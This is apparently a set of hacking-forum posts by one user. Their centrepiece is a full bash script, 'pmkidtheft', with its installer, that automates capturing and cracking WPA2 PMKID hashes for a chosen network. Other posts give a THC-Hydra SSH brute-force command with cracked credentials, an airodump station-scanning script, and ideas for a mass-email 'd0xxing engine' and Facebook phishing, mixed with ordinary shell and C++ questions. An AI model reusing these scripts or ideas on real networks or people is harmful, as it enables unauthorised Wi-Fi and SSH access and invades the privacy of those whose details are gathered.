vailixi

Deployment script for mining rigs. Cryptonote currencies using xmr-stak. Yeah same miner as for Monero.

This is hasty first draft. I scripted this attack. It's 5:20AM here and I haven't slept. (Neighborhood watch) This is most of what you need to get started. I've included an install script below as well. You'll need to run both as root. Usage ./pmkidtheft -E <ESSID> #!/bin/bash echo " _____ __ __ _ _______ _____ _______ _ _ ______ ______ _______ " echo " | __ \| \/ | |/ /_ _| __ \__ __| | | | ____| ____|__ __|" echo " | |__) | \ / | ' / | | | | | | | | | |__| | |__ | |__ | | " echo " | ___/| |\/| | < | | | | | | | | | __ | __| | __| | | " echo " | | | | | | . \ _| |_| |__| | | | | | | | |____| | | | " echo " |_| |_| |_|_|\_\_____|_____/ |_| |_| |_|______|_| |_| " echo " Automated WPA2 PIMKID cracking tool by Vailixi 2018" #### tool based on this tutorial https://www.youtube.com/watch?v=DarsUXcHTSU #### POSITIONAL=() while [[ $# -gt 0 ]] do key="$1" case $key in -h|--help) HELP="$2" printf "\n" echo " USAGE:" echo " pmkidtheft -E <ESSID>" printf " \n" shift # past argument shift # past value exit 0 ;; -E|--ESSID) ESSID="$2" shift # past argument shift # past value ;; *) # unknown option POSITIONAL+=("$1") # save it in an array for later shift # past argument ;; esac done set -- "${POSITIONAL[@]}" # restore positional parameters if [ $# -eq 0 ]; then printf "\n" echo " USAGE:" echo " pmkidtheft.sh -E <ESSID>" printf " \n" exit 1 fi systemctl stop NetworkManager systemctl stop wpa_supplicant systemctl stop dhclient airmon-ng check kill wifi=$(ifconfig | grep 'wl' | cut -d ' ' -f 1 | sed s/://g) mon=$(ifconfig | grep 'wl' | cut -d ' ' -f 1 | sed s/://g | grep 'mon') ifconfig $wifi down macchanger -r $wifi ifconfig $wifi up airmon-ng start $wifi timeout 10 airodump-ng wlan0mon -w wifis --write-interval 5 -o csv cat wifis.csv | grep $ESSID | cut -d " " -f 1 | sed s/,//g | sed s/://g > mac.txt hcxdumptool -o hash -i wlan0mon --filterlist=mac.txt --filtermode=2 --enable_status=3 hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force --show airmon-ng stop $mon systemctl start NetworkManager systemctl start wpa_supplicant systemctl start dhclient #!/bin/bash #### tool based on this tutorial https://www.youtube.com/watch?v=DarsUXcHTSU apt-get update -y && apt-get dist-upgrade -y && apt-get install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev -y apt-get install opencl -y apt-get install ocl-icd-opencl-dev -y git clone https://github.com/ZerBea/hcxdumptool cd hcxdumptool make make install git clone https://github.com/ZerBea/hcxtools cd hcxtools make make install git clone https://github.com/hashcat/hashcat cd hashcat make make install

Using script kiddie tools will teach you, troubleshooting, networking, operating systems, problem solving. Learning how to use man pages, --help, look up error messages, resolve dependency issues, properly word a forum question so as one does not get flamed, copy and paste from stack overflow. Learning concepts like io redirection, then thinking how do I code this to make it work faster and type fewer commands? Instead of using ip link or ifconfig and scrolling through output why not use some pipes and and maybe do some scripting. ifconfig | grep 'wl' | cut -d ' ' -f 1 | sed s/://g ip link | grep 'wl' | cut -d " " -f2 | sed s/://g Maybe start coding a tool for automating what's already there. It's a lot of command line statements to get the the MAC address of the access you point you want to attack PMKID on. Why type when you don't have to? Why not just make this all one function? systemctl stop NetworkManager systemctl stop wpa_supplicant systemctl stop dhclient airmon-ng check kill wifi=$(ifconfig | grep 'wl' | cut -d ' ' -f 1 | sed s/://g) mon=$(ifconfig | grep 'wl' | cut -d ' ' -f 1 | sed s/://g | grep 'mon') ifconfig $wifi down macchanger -r $wifi ifconfig $wifi up airmon-ng start $wifi timeout 10 airodump-ng wlan0mon -w wifis --write-interval 5 -o csv cat testtemp.csv | grep '$ACCESSPOINT' | cut -d " " -f 1 | sed s/,//g | sed s/://g > mac.txt hcxdumptool -o hash -i wlan0mon --filterlist=mac.txt --filtermode=2 --enable_status=3 hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force --show I think I just damn near scripted a complete automation of the PMKID attack while I was trying to explain what using automated tools will do for you. Sorry for crappy BASH example. My point on tools is don't reinvent the wheel. Make a better wheel and stipe the tires and such.

What are some good statements for getting GPU information. Pretty much I just need the make of the GPU so I can install drivers. Here's some of the ideas I came up with. As you can see they are not really catch all statements. I need just a bit of help. Any ideas would be great. ISINTEL="Intel" IsINTEL=$(lspci | grep -EA2 'VGA|3D' | grep '00:0' | cut -d ' ' -f 5) if [ "$IsINTEL" == "$ISINTEL" ]; then echo -e "Intel" fi ISNVIDIA="NVIDIA" IsNVIDIA=$(lspci | grep -EA2 'VGA|3D' | grep '00:0' | cut -d ' ' -f 4) if [ "$IsNVIDIA" == "$ISNVIDIA" ]; then echo -e "NVIDIA" fi ISAMD="Advanced" IsAMD=$(lspci | grep -EA2 'VGA|3D' | grep '00:0' | cut -d ' ' -f 5) if [ "$IsAMD" == "$ISAMD" ]; then echo -e "AMD" fi On a personal note, my BASH skills are getting a lot better.

I was wondering how does one go about creating system service on Ubuntu. What goes in the unit file and what other files are required and what other commands are needed to make this happen? I searched this and found a bunch of tutorials that don't work. Just get a bunch of error codes. systemd[1]: myservice.service: Main process exited, code=exited, status=127/n/a systemd[1]: myservice.service: Failed with result 'exit-code'. . I saw a tutorial that showed a script that assigned a process id that could be killed to stop the service. That also didn't work for me. What is the correct way to do this? Update. I figured this out. It was a matter of creating a .service file in /etc/systemd/system/ with a few lines. [Unit] Description=My Application After=network.target [Service] Type=simple PIDFile=/run/myapplication.pid ExecStart=/bin/myapplication ExecReload=/sbin/start-stop-daemon [Install] WantedBy=multi-user.target Then restarting the daemon with systemctl daemon-reload.

I made some posts about this a few years back but I can't seem to find those older threads anymore. Is there an archive or do those thread just get pruned out? That post had a lot of good syntax. Stuff I've pretty much forgotten again by now. I compiled a wordlist from about 1300 other sources. The one problem that I ran into with a lot of the Linux command line sorting tools was that they are memory intensive and sort just crashes when you feed it a file that is bigger than amount of physcial memory available. The coolest thing ever would be to have a machine with a lot of RAM then copy all of the files to a tmp folder and sort it there shaving off the read / write time to and from disk and just copying the final product to your primary storage. The split command came in handy for me since I don't have a lot of memory. sed, awk, grep are pretty handy for doing a lot of this stuff. sed awk grep sort split

This is pretty beast br0. It's always nice to see some new idea come to fruition. Wish you luck with this.

Programming is a lot like a chess game. You start by learning the moves then you work your way into things like openings and concepts like controlling the board and gambits. The into end games . You can start with a simple language like python, ruby or BASIC, to learn things like syntax and programming logic and work your way into more syntactically complicate languages like C and finally into An assembly language. Some people say you can learn an assembly language like x86 or ARM as a first language and I'm sure some people can but I barely understand it even after working with several other languages. If there is a college in your area with an instructor willing to teach you take advantage of that. I first taught myself just by downloading an IDE and watching some YouTube tutorials. I could have probably saved a lot of headache by taking some computer science classes if they were available.

I'm not a big powershell guy but I've been doing simliar tasks over ssh on Linux with sshpass and expect. Does -AsPlainText -Force allow you to do this without ssh-keyscan or is the pi already one of your trusted devices? It's funny I was thinking about trying to expect with regular expressions to automatically submit yes when logging in on a new machine but I came across ssh-keyscan and that helped quite a bit. ssh-keyscan -H 192.168.0.39 >> ~/.ssh/known_hosts Helped out tremendously.

I was kinda curious how other people would do this. So you take a regular Fibonacci sequence like this: 0 1 1 2 3 5 8 13 21 34 55 89 144 233 377 610 987 1597 2584 4181 6765 10946 17711 28657 46368 75025 121393 196418 317811 514229 832040 1346269 2178309 3524578 5702887 9227465 But I'm changing it up a bit so I get a different sequence like this one: 1, 2, 4, 7, 11, 20, 33, 54, etc The math looks something like this and I can do it on paper. 1+1+2+3+5+8+13+21+34+45+79 1+1+2+3+5+ 8+13+21+34+45 1+1+2+3+ 5+ 8+13+21+34 1+1+2+ 3+ 5+ 8+13+21 1+1+ 2+ 3+ 5+ 8+13 1+ 1+ 2+ 3+ 5+ 8 1+ 1+ 2+ 3+ 5 1+ 1+ 2+ 3 1+ 1+ 2 1+ 1 1 So in a regular fibonacci sequence it's something like this: #include<iostream> using namespace std; int main() { int fib1 = 0, fib2 = 1, fib3 = 1; cout << "The Fibonacci Series is : " << endl << fib1 << " " << fib2 << " "; while (fib1 + fib2 < 1000000) { fib3 = fib1 + fib2; fib1 = fib2; fib2 = fib3; cout << fib3 << " "; } cout << endl; return 0; } Not sure if the best way to to do this is write all of the possible fibonacci numbers to an array then loop through the array to add up the numbers for the sequence or if I should use the final fib values and count backward from the final two fib values just doing a backwards subtaction pattern. These are hypothetical questions. Question: Can you create a dynamic multi-dimensional array without knowing how many dimensions the array will have. I understand the part about creating a dynamic array where you can load in any number of variables. I suppose I could just load all of those values into an array then use nested for loops for each iteration. So int a =x; int b =x-1; int c= x-2; etc. Peronally I like array idea because it is easy but that's not the most optimal way to do it. I'm sure someone a little more savvy could make this happen using less memory and faster. Using Fibonacci's sequence to describe timeline forks. So say you have computer virus that spread from one machine to the next in a given amount of time. The first machine will continue to also infect machine until there are no more machines to infect. But that's not the only application for this.

I want to automate an SSH login. I was looking at sshpass or expect. But I haven't been able to find a working example of either. Anyboy use either of these? Also something of note. I don't know the hostname of the remote machine yet. I'm trying to get that in an automated way as well. I've tried raceroute, smbclient, nslookup, host, arp, and finger. Expect needs to expect user@host before it can send any commands over SSH but I don't know the hostname at this point.

No dawg. why would you think I'm trolling?

That's pretty much exactly what I wanted to do.

So I want to audit a few SSH servers. I want to save the output of THC-Hydra to a file then use the out of the file as variables in the next step of auditing. Trying to automate this this as much as possible. hydra syntax: hydra -o /root/Desktop/cracked.txt -l donkeypuncher -P /root/Desktop/thepassword.txt -s 22 10.42.0.196 ssh I want to use the output from the saved text file for the next step. I can get this a number of ways. this is simple. cat /root/Desktop/cracked.txt | tail -1 I get this output here:: [22][ssh] host: 10.42.0.196 login: donkeypuncher password: fistingtiffany I want to pretty much save the host, user, and password variables so I can use them in my script in the next couple of steps. How do I go about this?

ALFA is a good all around wireless device. I have the AWUS036NEH and it has never failed me when doing actually wireless hacking. I was using TP-Link and PCIe cards. They work fine for running deauths.

I need web hosting. I've tried ordering from the some of the major hosting companies lately. I've had two of payment gateways just repeatedly fail. Just looses my payment information or my account information. or it doesn't like my credit card or paypal doesn't work. I'm really sick of it. So I'm looking for a smaller business to host me. Where I can send you an email with my account details and you send me back a login and the nameserver I can point my domains to. Preferably you accept PayPal. And Go!

So you have a lock system that runs on 176khz. What kind of device would be used to capture RFID card information. Basically you swipe the card in from of the reader and it lets you in the door. I don't know a lot about access control systems and I'm kinda curious. Is there much security on these things or are they a lot like a garage door opener? I curious about auditing them and I also curious about things you can do to make them more secure. Any thoughts?

Is there a way to get verbose errors whilst debugging javascript? I had written an application in C++ and I'm porting it to javascript the only thing is javascript doesn't like some of the strings and just wants to throw an error. I looked up how to remove non-English characters a bunch of different ways. Not really sure what I'm doing wrong. It just says SyntaxError: missing ; before statement It links the line and thats all well and good but it's a string array with about 14,000 strings and where that missing ; is supposed to be I'm really not sure. Is there an IDE for javascript that will give me better error messages or some bash-fu I can run on the javascript files to remove the array elements that are not compatible? Also is there a maximum array size in javascript?

i wrote this kinda random inappropriate but probably funny emo band name generator. There's not much code to it really. It might be a good example for a newb coder for creating random numbers and using them to access items from an array but other than that it serves no purpose. Just for fun. Looking up the names and such was most of the work. I hope it makes you laugh. git clone https://github.com/vailixi/Emo_Band_Name_Generator cd Emo_Band_Name_Generator g++ -o names.o -c names.cpp && g++ -o names names.o to run ./names

I was just uploading files to drive and I was a little annoyed that my entire upload stopped to ask if I wanted to overwrite a duplicate file. The fact that firefox knows it's a duplicate file makes this a trivial point in programming. Since it knows the file is duplicate it should know what files are already on the server. If the file you are uploading is duplicate it should wait until the end to ask what you want to do with the file and upload the unique files first that way the entire download isn't stalled until you manually click the dialogue box asking if you want to overwrite the file or skip it. Just skip the file until the end of the upload. If you don't click the dialogue box within X seconds it just defaults to only uploading the unique files. I should code this option into a browser object and make it work just as an example. I'm just not really sure where to look for conditional http request. Anybody know of an arcane network programming book that covers topics like this? Better yet is there an implementation of this already somewhere that I can borrow code base from? Anyway what do you guys thing about this idea?

I was reading though this post on the old backtrack forum: http://www.backtrack-linux.org/forums/showthread.php?t=25343 There's some useful BASH there that will output the stations #/bin/bash wlaninterface=eth1 outputprefix=output sleeptime=30s maxclients=20 rm $outputfileprefix*.csv &> /dev/null airodump-ng -w $outputprefix --output-format csv $wlaninterface &> /dev/null & sleep $sleeptime kill $! grep -aA $maxclients 'MAC' `ls $outputprefix*.csv` \ | grep "$1" \ | sed -e '/Station/d' -e 's/,//' \ | awk '{print $1}' > list_of_station cat list_of_station You can just use something like sed to replace the : with - and cut the second half of the mac off then loop the csv file clients and output the oui from /var/lib/ieee-data/oui.txt for each client I'd write the whole function but I gotta go to work. Hope this helps. It's a little simple than all of the code that was up there.

I don't know if this had been covered. It's early in the morning and I'm always fully attentive until I've had coffee. There are 14 channels on wifi. Not sure which are used. Usually only 1-11 are used. But you can set your router differently. Not legal in all juristictions. airodump-ng has a --manufacturer option that will create it's own column in the csv file you can grep out the station MAC and manufacturer from the OUI list you'll need to run airodump-ng-oui-update

@Mother I'm just going to say this one thing. When you talk about hacking you might replace the word "victim" with "target". Target seems the more appropriate and professional sounding.

Actually yeah. You could probably create a list of emails with just the most common first names and last names and just create the emails like bob.holmes, bobholmes, or holmes.bob then append the domain at the end. Like the top 100 email providers like mail.ru, gmail.com, yahoo.com, etc. Then see if there is an email account associated with it. Or you could just create the email list and write a script to run searches on Google and Pipl for accounts. Then you could pretty much create an internet phone book of virtually everyone who uses those email services and has a common name. Like a d0xxing engine. That would be kinda cool. Really doesn't sound that hard to do either.

Faceboo users also have to accept the invite. So it would be like any kind of grey hat internet marketing campaign with success rates measured in percentages. So it's like dynamite fishing. Rather dynamite phishing. I know facebook only lets you have a maximum of 5000 friends per account and there is a maximum number of contacts you can have in gmail. The account used to add all of the friends may or may not get reported.